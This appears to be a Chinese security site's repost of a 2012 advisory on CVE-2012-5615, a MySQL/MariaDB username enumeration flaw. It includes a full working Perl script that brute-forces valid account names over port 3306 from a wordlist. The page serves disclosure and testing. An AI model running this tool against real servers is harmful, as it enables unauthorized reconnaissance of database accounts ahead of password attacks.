Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Oracle MySQL Server 5.5.19用户名枚举漏洞

发布日期:2012-12-01
更新日期:2012-12-05受影响系统:
Oracle MySQL 5.5.19
MariaDB MariaDB 5.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56766
CVE(CAN) ID: CVE-2012-5615Oracle MySQL Server是一个小型关系型数据库管理系统。MySQL 5.5.19及其他版本、MariaDB 5.5.28a、5.3.11、5.2.13、5.1.66根据是否存在用户名,生成的错误消息内容及回应时延都不同,这使得远程攻击者可以枚举有效的用户名。<*来源:Kingcope (kingcope@gmx.net)
 
  链接:http://secunia.com/advisories/51427/
        http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0005.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# MySQL User Account Enumeration Utility
# When an attacker authenticates using an incorrect password
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
# the mysql server will respond with a different message than Access Denied, what makes
# User Account Enumeration possible.
# The Downside is that the attacker has to reconnect for each user enumeration attempt
#20000 user accounts in 7 minutes
#Mon Jan 16 09:00:18 UTC 2012
#Mon Jan 16 09:07:26 UTC 2012
#root@vs2067037:~# wc -l MEDIUM.LST
#21109 MEDIUM.LST
#A usernames.txt wordlist is included in this package
#examples:
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: administrator@host
#
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: admin@host
#use IO::Socket;
use Parallel::ForkManager;
$|=1;if ($#ARGV != 1) {
print "Usage: mysqlenumerate.pl <target> <wordlist> ";
exit;
}$target = $ARGV[0];
$wordlist = $ARGV[1];
$numforks = 50;
$pm = new Parallel::ForkManager($numforks);open FILE,"<$wordlist";
unlink "/tmp/cracked";@users = ();
$k=0;
while(<FILE>) {
        chomp;
        $_ =~ s/ //g;
        $users[$k++] = $_;
}
close FILE;
$k2 = 0;
for(;;) {
for ($k=0;$k<$numforks;$k++) {
$k2++;
if (($k2 > $#users) or (-e "/tmp/cracked")) {
exit;
}
my $pid = $pm->start and next;
$user = $users[$k2];
goto further;
again:
print "Connect Error ";
further:
my $sock = IO::Socket::INET->new(PeerAddr => $target,
                              PeerPort => "3306",
                              Proto    => "tcp") || goto again;
recv($sock, $buff, 1024, 0);$buf = "x00x00x01x8dx00x00x00x00$userx00x50".
                        "x4ex5fx51x55x45x4dx45x00";
$buf = chr(length($buf)-3). $buf;
print $sock $buf;
$res = recv($sock, $buff, 1024, 0);
close($sock);
if ($k2 % 100 == 0) {
print $buff." ";
}
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}
unless (-e "/tmp/cracked") {
open FILE, ">/tmp/cracked";
close FILE;
print " [*] HIT! -- USER EXISTS: $user@$target ";
open FILE, ">jackpot";
print FILE " [*] HIT! -- USER EXISTS: $user@$target ";
exit;
}
}
$pm->wait_all_children;
}建议:
--------------------------------------------------------------------------------
厂商补丁:Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.oracle.com/technetwork/topics/security/Fortinet FortiOS (FortiGate) “conversationContext”跨站脚本漏洞Apache Tomcat 今天再爆严重安全漏洞相关资讯      MariaDB  MariaDB安全漏洞  MySQL安全漏洞 
  • Ubuntu 16.04 Dockerfile 安装  (今 10:03)
  • MariaDB 10.1.11 发布下载,MySQL   (02月04日)
  • MariaDB 10.0.23 发布下载  (12/21/2015 20:50:21)
  • CentOS 7.0 使用 yum 安装 MariaDB  (03月03日)
  • MariaDB 10.1.10 发布下载,MySQL   (12/26/2015 10:55:29)
  • CentOS 6.6下编译安装MariaDB-10.0  (12/21/2015 19:25:47)
本文评论 查看全部评论 (0)
表情: 姓名: 字数